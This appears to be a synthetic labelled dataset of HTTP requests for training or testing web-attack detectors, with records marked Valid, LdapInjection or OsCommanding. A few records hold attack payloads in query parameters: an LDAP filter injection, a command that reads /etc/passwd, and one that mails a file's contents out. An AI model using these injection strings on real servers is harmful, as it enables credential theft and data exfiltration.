MIME-Version: 1.5
Pragma: rc=o
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: teeta oybqtth=we3ig9Q
Range: 461-5609
Referer: /adlda/tGrheHd/tp3o4lot.css
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 1.9; ls-tR; rv:4.9.7) Gecko/19225850
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 4.3 www.plsonT.js, 1.7 www.hclt.gif
Transfer-Encoding: identity
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40155
Start - Id: 28493
class: Valid
GET /udjROzGWxLD/n6/Hpasswd6Fsp_@KACT/no/tih66atN1/22.js? HTTP/1.0
Host: www.sgrmss.uk:80
Connection: keep-alive
Accept: application/postscript;q=0.4, image/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fe4liu-fob, qa-elq, dvfe67o-hln7itLj, t-c7g;q=0.8, Eua-0e
Cache-Control: roho='oftao'
Client-ip: 229.55.227.78
Cookie: adrm6ets=lAAdoTDNukO;nrean=as3tnnjc;en2s=ban;FyxBcpasswdJstdinhavingA=rBCS-ZHnGlH
Cookie2: $Version="794"
Date: Sat, 01 Nov 08 17:50:32 GMT
ETag: "7v1k5OEHH1noZDlI186"
Expect: 100-continue
From: eSaii@Beribes6hy.fr
If-Modified-Since: Fri, 11 Jan 08 06:40:22 UTC
If-Unmodified-Since: Thu, 29 Apr 10 01:28:35 UTC
If-Match: "1@5fSMP-AwJXg6RLgYrY"
If-None-Match: "9aVQ.Q19klv1cnDX0qp"
If-Range: *
Max-Forwards: 9038
MIME-Version: 1.7
Pragma: enahe='oricoe'
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: NTLM b3BtaGluc2ltYXM1ZXJlY3RoZ2lyZGhpb2llczlhcnBxb3JwZWxkZXVz
Range: 342905-6,364-
Referer: http://www.maaoeep.cz/tfoo/d7yp/oTrouva.html
TE: gzip;q=0.5
Trailer: Connection
User-Agent: Mozilla/1.3 (compatible; MSIE 9.3; Win98; lta0u)
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: dhceHo/2.1 162.169.250.198, HTTP/8.8 www.ghoys.tiff, u7wR/7.9 www.6ksonnss.png
Transfer-Encoding: deflate
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 98743
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28493
Start - Id: 24181
class: Valid
GET /6e8assSxgottx/oyti/T275FY-AmochaJvbscriptseval@/7le8ehifekbhiorlne/rF2h.html?eoaq0tr0itacho=ienrf2oa%5D%24&hr9y4ntfo=ttd+nci4oUtsEeeN&e0disennrd=erselectip+%3C%5Cruye%29%7Cae&teetIeDolts=19560 HTTP/1.1
Host: www.elgiaa.com
Connection: e1yrih
Accept: video/*;q=0.5, application/rtf, audio/x-wav;q=0.0
Accept-Charset: koi8, iso-8859-8;q=0.5
Accept-Encoding: compress, compress;q=0.1, gzip, identity;q=0.8, compress;q=0.6
Accept-Language: *
Cache-Control: tnonebsp='eMl'
Client-ip: 218.99.99.50
Cookie: ToJqooeidyf=s3Tls43;Thj5w1l=gss
Cookie2: $Version="26"
Date: Sat, 05 Jan 08 06:45:47 UTC
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: ayael@sasgerntqn.it
If-Modified-Since: Thu, 25 Mar 10 24:45:28 CET
If-Unmodified-Since: Sat, 02 Jul 05 22:01:36 GMT
If-Match: *
If-None-Match: "Pgb9RFhrSTADgXsatz"
If-Range: Thu, 16 Jul 09 07:18:00 CET
Max-Forwards: 31
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: http://www.rhw1mvra.de/ata5l/m4lf/qiontgt/rsteee/atgeco7O.gz
TE: deflate;q=0.9,trailers
Trailer: Upgrade
User-Agent: Iwiayc7ao3ve27h3
UA-CPU: PowerPC
UA-Disp: 848,875,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: gzip
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 172.198.248.143
X-Serial-Number: 742584885345002527
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24181
Start - Id: 12006
class: Valid
GET /rx/oGhj.b4@/kh.aspx?sOresntArRlaT7s=nshN&rWZtvbscript5window.open-x=2906&9bice=4389&hHyzctu=56796366&k0hotmmtheoaRn=0016862&QevalfNCg2having=u&Eqten=RlocationxgiUaopenSse%24e&saefkba3zlmlhn=i4%2Bcissmmt&_Zas4=7746&diawlejcctieh1m=315104200&ysrn7Mdteaqs0oS=i6m&naxoa=64hk HTTP/1.0
Host: www.patt.net
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.1, iso-8859-2;q=0.8, utf-7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=877
Client-ip: 200.242.163.215
Cookie: ee5=>4rzd a4iselectp ;nhrd=>ox@oj2aeCleS;tae;_dm0l2i9HbinD=e.57V9dOD9
Cookie2: $Version="72"
Date: Fri, 26 Mar 10 03:57:00 GMT
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: ecltistt@earirni.gov
If-Modified-Since: Thu, 15 May 08 21:24:09 CET
If-Unmodified-Since: Sat, 02 Jun 07 10:00:50 GMT
If-Match: *
If-None-Match: "yCgb5Q.LelPcQ3X7BDY"
If-Range: *
Max-Forwards: 9849
MIME-Version: 7.7
Pragma: Nehjg6a=rm9I6
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -8,856500-,-6463
Referer: http://www.eter.st/2ohosmt/ntNeu/dbEeese/therhdte/tudoowle.cfm
TE: trailers
Trailer: Accept
User-Agent: EStAfid/7.7.1.4.2
UA-CPU: x86
UA-Disp: 216,5024,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 165x736
Via: ok8cg/8.7 www.iww5gt.shtml
Transfer-Encoding: deflate
Upgrade: mied/2.1, ubr6/9.8, kedlo/6.1, ohn/1.7, Ncaq/5.3
Warning: 262 www.itetharh.css "tdqd4ieaDLErnog" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 733133463900664569
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12006
Start - Id: 8720
class: Valid
GET /toolofglt28/tbpS0u48VycwBar/enXftp@m1oKL/cugnrVhabn/-7/otnrRaeet/Wa_u6O/7RzrMhH/bTnujN8QYyR_HZ/tB4djKy.gif?aeneAhwMykat=he&e4t=181612&PeJusrwMp=GO2sml HTTP/1.0
Host: 78.44.201.169:22
Connection: aortss
Accept: application/*;q=0.0
Accept-Charset: iso-8859-8, x-mac-turkish, windows-1251;q=0.2, big5;q=0.6, iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 52.104.37.255
Cookie: 8rie3low=hpqi8kGfeVtcanTnTa;reatr=[ r;Yirsauahh7rbNm=7109149588
Cookie2: $Version="1"
Date: Fri, 03 Jun 05 10:46:22 UTC
ETag: W/"y0VZon7C5tqGBFr_XFT"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Thu, 11 Nov 04 08:49:01 UTC
If-Unmodified-Since: Sat, 16 Jan 10 23:33:25 CET
If-Match: *
If-None-Match: "F_eAAGaVjV3kz@Loq0yF"
If-Range: Tue, 15 Jun 04 18:19:37 CET
Max-Forwards: 23
MIME-Version: 9.4
Pragma: n=ea
Proxy-Authorization: as9ct dmdsne=vmoz7nhe
Authorization: eadihh nt4isut=topm
Range: -1251,-8,78356-
Referer: /rnesgz.nsf
TE: deflate;q=0.2,trailers,gzip;q=0.3
Trailer: If-Match
User-Agent: ah0aKm5d2tensEama
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 559x025
Via: 1.2 183.154.39.41:9522, FTP/9.6 5.48.116.160
Transfer-Encoding: gRhefv
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 722 191.87.245.62 "ldhaa3etlrseAcnvoe3a" "Fri, 03 Dec 04 20:48:39 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 23222
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8720
Start - Id: 32320
class: Valid
GET /gDPZy/XgJ3IF4/tNsB/deletehM67YRwaIc@S/LmiSb2/eS1vdlJNMuXMF/ethHi78w0L/fj.1KOG8cw9R4qkR/7tBRLhtpassM/J5/mW7NsshJE.sh? HTTP/1.1
Host: www.totigtno.fr
Connection: close
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.8, compress;q=0.0, deflate, deflate
Accept-Language: Bs-ul, ahm-3me
Cache-Control: ihsDjcau='t'
Client-ip: 248.252.118.87
Cookie: nhpaw=roeUrDorsdor1abg7;fNi@mlog=454943193
Cookie2: $Version="9"
Date: Sat, 17 May 08 01:40:30 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Tue, 08 Jun 04 20:11:11 UTC
If-Unmodified-Since: Sun, 21 Aug 05 06:04:44 UTC
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "hPEpQ1o3r9j31l2eMcD"
If-Range: Sat, 23 Jun 07 11:32:43 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dWVFeG5jM2Zsc2Z1eW5uaG5SVGhlQkV6bW9pNmRvTmluc3RyaXRiVW56MQ==
Authorization: Basic NmxpRnJkbDplQWU2
Range: 2-941553
Referer: /hnZ5/cbwjuarc/o3otsTep/iaiec/oiai.jpeg
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 4.8; oe-re; rv:8.6.2) Gecko/88227638
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: 8.2 www.tvmd.css, 2.4 www.s1a3yot.htm, oeia/8.4 www.bqnbel.png
Transfer-Encoding: deflate
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 990 99.59.172.76 "cgrwSsa" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 454901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32320
Start - Id: 37025
class: LdapInjection
GET /mA/ch25h0Efore/qnlM1.6R.aI/xEshArec/0vDPsMSWz8.Elib@/ea6owletSiuezewlsivz.exe?QetcbD7DDc4BH_=rG7gvB71rU&n4edd=%29+%28+++%7C++++%28cn%3D*o+++%27brien*++%29%28mail++++%3D*o%27brien*%29++&mtnueRi=ir&Ktzo1hnodeY=tp%40tru&marfkridfcfh=teerodrue6efc&IfghOjih=967&tmenrdf=22254&3igltl0nsdgywf=temo&etlC3lfidiw=1wvTu7&utu2a=bNtE&oEcoZ3=ai0klG&ntfE=s&Ja=ro8ta_lc4 HTTP/1.1
Host: 233.94.240.47
Connection: close
Accept: video/*;q=0.7
Accept-Charset: isiri-3342;q=0.9, x-mac-hebrew;q=0.1, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: cry31r-3eZasibr;q=0.1, yiRa-cons, hc-OTrl;q=0.5, np-ata
Cache-Control: min-fresh=6
Client-ip: 35.224.123.165
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="984"
Date: Mon, 04 May 09 14:20:21 CET
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Mon, 02 Apr 07 05:03:52 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: /endPtcee/Nhcve/et1ecemv/7earc6.pl
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: eUzc_x http://www.e0ahi5r.uk
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: identity
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37025
Start - Id: 32213
class: Valid
GET /teM_JEsdLA2Phd/ifvse1Tkqlaemf/eVcIe3V.C_Ly.gay8Hqc/tsL/iU/Q7QVR%u7XdlTI4LV.asp? HTTP/1.0
Host: 245.254.62.129
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 35.244.158.238
Cookie: enPauiyE1=5;Aichmm=4
Cookie2: $Version="64"
Date: Sun, 26 Jun 05 19:09:19 CET
ETag: "6H4oU6rLd64-wiGA"
Expect: 100-continue
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Fri, 08 Jun 07 20:01:55 CET
If-Unmodified-Since: Fri, 11 Aug 06 17:36:13 UTC
If-Match: "R87G4_IAN1RGNwD"
If-None-Match: "taG9-SSSibHHiQY5TH"
If-Range: Sun, 26 Sep 04 04:44:54 GMT
Max-Forwards: 3
MIME-Version: 4.3
Pragma: ntsae='e88E'
Proxy-Authorization: NTLM aElzZWVzdGx0MGpzb2lpd2RmMGNpbHM4bW9PVHVoZ2xub29uY1VyZTBJR2xlbHA=
Authorization: Digest username="seRoeent"
Range: -31011,02795-
Referer: http://www.rirpo.net/SnNelff/ctwchet/as0ol/ylsacwEt/lonhteai.swf
TE: trailers,trailers
Trailer: Range
User-Agent: sBGScG http://www.uEvLbhr.de
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9868x2835
Via: rLhh/7.8 www.FcOas.js
Transfer-Encoding: identity
Upgrade: rsesd/2.4, wei/5.5
Warning: 498 120.1.39.164 "tiusLw" 
X-Forwarded-For: 70.164.255.160
X-Serial-Number: 76488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 32213
Start - Id: 6152
class: Valid
PUT /n.5Twzy.exe? HTTP/1.0
Content-Length: 11
Content-Language: el
Content-Encoding: compress
Content-Location: http://www.hzv1aOma.it/ixxaiben/npoe5i/tsHisj/tGmanll/hhde.php3
Content-MD5: eG5oZWEzdmwwdHM3bG9tbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Jan 10 11:56:02 GMT
Last-Modified: Wed, 26 Jan 05 08:15:15 UTC
Host: www.9soqi.net
Connection: close
Accept: audio/x-wav, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 193.131.23.121
Cookie: T6i9iaTs=a ;zq4E1=SHpyu;_c.vDb=nees2s8oecina8tpan;noiets=1358;6aonwebq=30;gncNncC=aj
Cookie2: $Version="52"
Date: Sat, 05 Feb 05 20:22:43 CET
ETag: W/"pq7cSOmHvWLSWCvL"
Expect: ntotfl=tARTotmv
From: arnac8@nERnnE.be
If-Modified-Since: Mon, 02 Mar 09 09:43:02 UTC
If-Unmodified-Since: Fri, 25 Apr 08 23:17:28 GMT
If-Match: *
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: Fri, 02 Feb 07 10:33:56 CET
Max-Forwards: 1002
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: ettpre Oeat=7dtf2s
Range: 611533-,1458-075
Referer: /rgchA/ryrtb/mvte/utvzra.shtml
TE: deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.3 (compatible; iscYt; Win98; oTkndottna)
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0700x717
Via: 4.3 www.c54pRurv.jpeg:27310, HTTP/6.1 www.sNtrx4i.htm
Transfer-Encoding: deflate
Upgrade: pwlrab/6.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

edohNeli=00

End - Id: 6152
Start - Id: 11206
class: Valid
GET /nn.htm?hPx1=67248240&jelerhmtOt=aba%3D&K8mNGrEn9=nlaeomm&sd=aeE&RBshutdownNlYu0InullK1=dxqemtd&pt3Eeiah8=ei%2F2%3Ae%3Bxeasnphpr+%28&UaccepthJ8giframezn=4&iaenw=74860247&nwdrtad5ernnU=rioooZle%5DAopA&EsGrdu6ynmpoa=gti%24ug%5Dy%26z%7Ct%5Cbtr&jEie=46048687 HTTP/1.0
Host: 145.16.247.45
Connection: keep-alive
Accept: image/png;q=0.0, image/gif;q=0.5
Accept-Charset: x-mac-greek, iso-8859-15, iso-8859-2, euc-cn;q=0.8, iso-2022-jp
Accept-Encoding: identity, compress;q=0.0, gzip, identity;q=0.7
Accept-Language: s-kArBep, hphbyg-P2ehnn;q=0.3, aisNnh-eesa
Cache-Control: max-age=5008
Client-ip: 57.60.178.137
Cookie: PFX4varx9h=oE;rdlga=eWHV5k;uhnUoomlde=676871186;ZPJJSG-=si rt&ou?divmtz;savthoa=a-t>e
Cookie2: $Version="05"
Date: Tue, 27 Jan 04 13:06:23 CET
ETag: W/"TTuVm-_TmsadXoP"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Mon, 24 Jan 05 11:53:24 GMT
If-Unmodified-Since: Mon, 08 Mar 04 18:51:59 CET
If-Match: "iJpf3PWf3c-xqFfJes4"
If-None-Match: "SM-fajmz6wyyGfk6R"
If-Range: "FMRDR1VMg5B2e2z"
Max-Forwards: 3243
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="irua"
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: /taguwni/qeeope/awth/mni6.php
TE: deflate;q=0.3
Trailer: From
User-Agent: Taf5epnrt/2.8.8
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1597x0250
Via: turNtn/1.8 www.tnenOn.tiff, FTP/7.7 www.GBwnhu.css, 5.0 www.uxrysuj.png
Transfer-Encoding: nnp87y
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11206
Start - Id: 43280
class: OsCommanding
GET /a9hDsNr/eL-2xFi/H8DY.SU./iUyW99HaDOjsWKUtoY/412-Z/qa/evbscriptDtvxmlps%u7@rKzr/bSM7ya/pt/x-Tftyc2Im9zt1_12lQ.asmx?aincis=2&er2oast=lIt&fiSntGrlt=%40&hticsladelio=32&P2Xhimgi=%27+++%3B+++++cat+%2Ftmp%2Fres+++++mail+stis%40lealis.com+%3B HTTP/1.1
Host: www.sotah.be
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: n-r3s, c-e, eduhitbt-ixs, Soaj0x-rencog
Cache-Control: ng=ico95H
Client-ip: 86.210.157.25
Cookie: etrC=932359268;xroed=429;ge1o=7eo?likefNshtpassoe g
Cookie2: $Version="414"
Date: Sat, 15 Mar 08 20:37:48 CET
ETag: "uw0F93ddPpx2gjr8"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: "LlYqESggmMdvozlOuT"
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: eeic='a'
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: /bs4e/uvi359.gif
TE: gzip;q=0.7
Trailer: If-None-Match
User-Agent: eoiCsnDdEl/3.3
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 1.9 25.119.100.138, 7.5 www.iseerez7.css, 0.4 www.seeiiiOs.html
Transfer-Encoding: identity
Upgrade: siree/9.1, 17aa/1.9
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43280
Start - Id: 36826
class: OsCommanding
GET /0Yhh.gif?lnEieoflke=%7C+cat++%2Fetc%2Fpasswd&xuf=8nn%3Er&JP7r44replaceTW=rcft%40rt&rznT4moos=90&sdito=lkUO&sheooI=dand%24at%3Cyhmecholhna%2F%3De&obg=xml&dj=b6XTRLI0&etttfMtrpkxoh=e7vjF3&lhTailieoh0=var%2BhA&ani9gx2=0nrcprauOauupEc8&icsSheaeo=724559&uptp=4730249&tea3eneosGea=nLhb&kf2_S=i%3DmzmunionI-ihf-%5Cc HTTP/1.1
Host: 236.244.17.176:20122
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-8-i;q=0.9, shift_jis, iso-2022-jp;q=0.3
Accept-Encoding: 
Accept-Language: efEt-pee7, ceji3vw-ei2uoi, eesthe-nbaeti;q=0.8, bn6ekhd-cee5ofph
Cache-Control: no-store
Client-ip: 131.196.248.228
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="595"
Date: Fri, 09 Jul 04 12:21:44 GMT
ETag: "q2L5HlLeYeT@4wEqF"
Expect: 100-continue
From: aPre@Ehts2SDd.ch
If-Modified-Since: Thu, 26 Apr 07 19:53:05 CET
If-Unmodified-Since: Mon, 20 Jul 09 22:12:34 UTC
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: *
If-Range: *
Max-Forwards: 813
MIME-Version: 3.6
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: feae0r rnat9e0n=aenga
Range: -95
Referer: /easeT.mdb
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 8.1; hi-fo; rv:8.5.8) Gecko/37439723
UA-CPU: 68000
UA-Disp: 603,438,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: INue/8.7 www.dtvlf.js
Transfer-Encoding: compress
Upgrade: ehioe/8.2, aew/1.1, i8tRt/4.5, Ox2yni/4.8, 3seho/8.1
Warning: 917 63.115.145.135 "Ohgd7" 
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36826
Start - Id: 2739
class: Valid
GET /O0/wppvo5/mttensIebihGN.js? HTTP/1.1
Host: www.qa2Ec7.com
Connection: rrleaR
Accept: text/*, text/plain;q=0.7, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: er-lmc
Cache-Control: ve=deP2
Client-ip: 0.74.23.133
Cookie: Et=28922;xote=04483;liv15ce9=tddchh3ec;sib4mam=0955;tdsr=mPoG_.jx_;Icvsheetei=n$perl eN~t\a
Cookie2: $Version="32"
Date: Mon, 23 Nov 09 23:10:43 CET
ETag: "A0y4waR8Yq4Jcqlj71eN"
Expect: u70trk
From: dasa@Cnth.cz
If-Modified-Since: Fri, 05 Mar 04 17:54:45 CET
If-Unmodified-Since: Thu, 25 Nov 04 04:36:37 CET
If-Match: *
If-None-Match: *
If-Range: "XuznvzKnXDPoBYnWyaVf"
Max-Forwards: 990
MIME-Version: 3.9
Pragma: owoecdaa='pamcy'
Proxy-Authorization: Digest response="02D6BaecFFA3379a1eecdD1AaF59eEDC"
Authorization: Basic cGR0bmQ6YmxvZmNjcA==
Range: 8-,-0,6-
Referer: /bfup3l/fxcxt/euEmxtyU/sieDh.jpeg
TE: trailers
Trailer: From
User-Agent: uabtsa/6.2
UA-CPU: StrongARM
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9002x158
Via: 4.2 221.174.130.68:427
Transfer-Encoding: deflate
Upgrade: ltniik/7.5, 1Ntcmo/9.7
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2739
Start - Id: 4840
class: Valid
PUT /gFuKx_nltHGjq55/cuuhe2htr1bihut/net7aHinaes/i7bs-ZCandison/2mibe1fotUune/lyLl3AGOG7UP2n/eB7P.zGbu-ahLAVKQG.aspx? HTTP/1.1
Content-Length: 25
Content-Language: cieevar,gu,rcbc
Content-Encoding: identity
Content-Location: /eiheRn/ieiiEocy.wmn
Content-MD5: NjVvcm5oYXR0ZnphbnM0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Feb 06 22:38:46 GMT
Last-Modified: Sat, 14 Jan 06 17:31:07 CET
Host: 68.213.164.121
Connection: close
Accept: application/rtf;q=0.7
Accept-Charset: euc-jp
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 155.243.198.117
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="96"
Date: Tue, 02 Mar 10 12:32:42 UTC
ETag: W/"uFsE8xGQS24X8Lt9"
Expect: 100-continue
From: leaTmHa@pheie.net
If-Modified-Since: Tue, 13 Oct 09 01:17:42 CET
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: *
If-None-Match: *
If-Range: "IeuJy7PMh0YQU_KrR"
Max-Forwards: 5
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic aXpldGk6Y2VzYjN0ZQ==
Range: -2648,-1383,481-169
Referer: /drtgVmu/mwIeeln.jsp
TE: trailers,chunked;q=0.7
Trailer: Accept-Language
User-Agent: dtcIuhfnxsrmhtslw
UA-CPU: StrongARM
UA-Disp: 092,446,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 812x666
Via: 1.0 208.180.199.226:2
Transfer-Encoding: compress
Upgrade: 0coex/6.3, 92da/1.7, 0o7h/3.9, 0ah/4.2, etiE/1.6
Warning: 023 191.251.175.83:94352 "ra7sp6lsitbtinme" "Sat, 03 Oct 09 15:33:52 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 408211072514512
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3S5logqS5kI=ctsi&loea=s3e

End - Id: 4840
Start - Id: 15745
class: Valid
GET /Slpyease2/u-9hI16Ko9/nEseeorstT/nAtthahaTvei8a/e_oTS3oZWm/iiaEsb/rBBZDFvqT0i4/2h/i4gS3KMVJaq8.html?otsanhht5Oi=aSOLn&daelcd=l%5C9bz&XVQ8qI=wiM8PPp0uyxr&xertohoiaaguTln=aQiodronFsA&eftyasoef=iuassnE&ENh=ollb&nsesaeEehijss9F=Ohomehomel+ohtelneti&esreFe=dft HTTP/1.0
Host: 23.137.56.241
Connection: keep-alive
Accept: audio/*, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate;q=0.1, compress, deflate;q=0.1, compress;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 156.97.210.92
Cookie: ob=315888;Di6hFog8etLepa=mslikeoei;v;aaalVzSekeho=02614364
Cookie2: $Version="5"
Date: Sat, 30 Aug 08 16:04:00 CET
ETag: "y-BoSH_Qn.9YebnIUJ"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 07 Feb 04 14:40:08 GMT
